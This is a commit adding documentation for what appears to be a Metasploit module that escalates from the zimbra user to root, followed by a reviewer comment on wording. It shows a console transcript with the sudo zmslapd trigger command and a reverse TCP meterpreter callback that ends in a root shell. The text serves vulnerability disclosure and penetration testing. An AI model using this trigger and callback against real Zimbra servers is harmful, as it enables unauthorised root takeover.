Add documentation
This commit is contained in:
parent
6e8d04ddc9
commit
be25e1fc77
|
@ -0,0 +1,47 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Currently, as of 2022-07-26, all versions of Zimbra are vulnerable. Presumably they'll patch it eventually - I have an open security ticket with Zimbra.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Install Zimbra on any supported Linux version and get a session as the `zimbra` user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...
|
||||
|
||||
```
|
||||
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
10 meterpreter x86/linux zimbra @ zimbra.example.org 10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)
|
||||
|
||||
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
|
||||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
|
||||
SESSION => 10
|
||||
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.0.0.146:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Executing: sudo -n -l
|
||||
[+] The target is vulnerable.
|
||||
[*] Creating exploit directory: /tmp/.5kq9XO
|
||||
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
|
||||
[*] Sending stage (3020772 bytes) to 10.0.0.154
|
||||
[+] Deleted /tmp/.5kq9XO
|
||||
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
### SUDO_PATH
|
||||
|
||||
The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.
|
||||
|
||||
### ZIMBRA_BASE
|
||||
|
||||
The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.
|
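Review bot: The "Vulnerable Application" section says all versions are vulnerable but never says what the vulnerability is or what the module depends on. A reader can only infer it from the transcript, where the check runs `sudo -n -l` and the trigger is `sudo /opt/zimbra/libexec/zmslapd -u root -g root -f <file>`. Please add a sentence or two stating that precondition (the `zimbra` user being allowed to run `zmslapd` through sudo without a password) and the Zimbra version you tested, so the section still makes sense once a fix ships and "as of 2022-07-26" is out of date. In "Verification Steps", the prose ends in "Then..." and leaves the steps implicit in the console output. A short numbered list (get a session as `zimbra`, `use` the module, `set SESSION`, `exploit`, confirm `getuid` returns root) would be easier to follow. Under "ZIMBRA_BASE", "I'm not even sure if it _can_ install elsewhere" is better either confirmed or dropped in favour of just stating the default.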